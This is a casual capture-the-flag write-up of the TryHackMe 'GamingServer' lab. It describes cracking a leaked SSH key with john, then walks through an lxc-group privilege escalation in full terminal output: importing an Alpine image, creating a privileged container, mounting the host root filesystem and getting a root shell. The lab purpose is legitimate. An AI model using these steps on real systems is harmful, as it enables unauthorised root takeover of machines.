Writeup GamingServer TryHackMe

Running a simple Content discovery with burp, you will find a secret folder with a private ssh key and a corresponding wordlist to crack it. load it to john with 2john and you got its pass. allowing a ssh login with the key as the user, which you’d found in comments on the site. yes boring. cat user.txt, flag scored.

looking for priv esc i found the user to be in the lxc group, so we probably can elevated by mounting the root fs as fs in an container, like when you’re in the docker group with docker. lets see.

yup, as i thought, build an alpine lxc container…

--2020-09-23 08:31:21--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 3215528 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20200923_1026.tar.gz’

alpine-v3.12-x86_64-20200923_1026.tar.gz                   100%[=======================================================================================================================================>]   3.07M   791KB/s    in 4.0s    

2020-09-23 08:31:25 (787 KB/s) - ‘alpine-v3.12-x86_64-20200923_1026.tar.gz’ saved [3215528/3215528]

john@exploitable:~$ lxc image import alpine-v3.12-x86_64-20200923_1026.tar.gz --alias alpine
Image imported with fingerprint: 2ef98380d91867a7d01854e7a03b528e5880e90b30ba80f0dfb5731eb0009c8e
john@exploitable:~$ lxc image list
| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
| alpine | 2ef98380d918 | no     | alpine v3.12 (20200923_10:26) | x86_64 | 3.07MB | Sep 23, 2020 at 8:31am (UTC) |
john@exploitable:~$ lxc init alpine ignite -c security.privileged=true
Creating ignite
john@exploitable:~$ lxc config device add ignite alpine disk source=/ path=/mnt/root/ recursive=true
Device alpine added to ignite
john@exploitable:~$ lxc start ignite 
john@exploitable:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cat /mnt/root/root/root.txt

pwned. ez af :-P

Leave a Comment